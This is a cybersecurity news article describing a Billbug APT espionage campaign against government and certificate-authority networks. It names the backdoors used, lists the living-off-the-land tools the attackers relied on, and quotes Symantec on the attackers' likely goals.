An ongoing campaign attributed to the infamous APT group Billbug, also known as Lotus Blossom and Thrip. This APT group has been active since 2009, and it has previous attack records found in the 2018 and 2019 periods when they employed backdoors called Hannotog and Sagerunex.
The same backdoor activities have been found in the recent campaign that targets the government and CA networks. Researchers believe that the attackers compromised a large number of victims through this campaign.
A successful compromise of Certificate Authority is potentially dangerous because that allows attackers to issue a valid digital certificate to sign malware and evade detection and also lets attackers intercept the HTTPS traffic.
Malware Attack Infection Chain
During the investigation of the campaign, researchers found that the attackers employed the extensive use of both dual-use and living-off-the-land tools.
Also, some of the indications say that APT hackers
There are several publicly available tools of the following have been used in this attack:
- AdFind – A publicly available tool that is used to query Active Directory.
- Winmail – Can open winmail.dat files.
- WinRAR – An archive manager that can be used to archive or zip files – for example, prior to exfiltration.
- Ping – A tool that is freely available online that can allow users to determine if a specific location on a network is responding.
- Tracert – A network tool that can be used to determine the “path” packets take from one IP address to another.
- Route – A path for sending packets through the internet network to an address on another network.
- NBTscan – Open-source command-line NetBIOS scanner.
- Certutil – Microsoft Windows utility that can be used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates.
- Port Scanner – This allows an attacker to determine what ports are open on a network and could potentially be used to send and receive data.
Also, another notable activity by this APT group is that they are using a Penetration Testing tool called Stowaway used among the penetration testers community, and the tool has been written in the Go language. but this is not an unusual thing, as threat actors often use penetration testing tools for the attacks..
Upon the technical analysis, Sagerunex backdoor that believed to be dropped by the loader malware, and it has featured the ability to communicate with the help of its C&C server.
Researchers from Symantec analyzed the sample and found logs that encrypted and the encryption algorithm used is AES256-CBC with 8192 rounds of SHA256 and is used for network communication.
“The main motivation of this campaign believe to steal data from the target such as CA and government victims, and the targeting of the government victims is most likely driven by espionage motivations, with the certificate authority likely targeted in order to steal legitimate digital certificates” Symantec briefs in a blog post shared with Cyber Security news.
The fact that the attackers behind this campaign have the ability to compromise multiple targets at once, There are several highly skilled actors involved.
Indicators of Compromise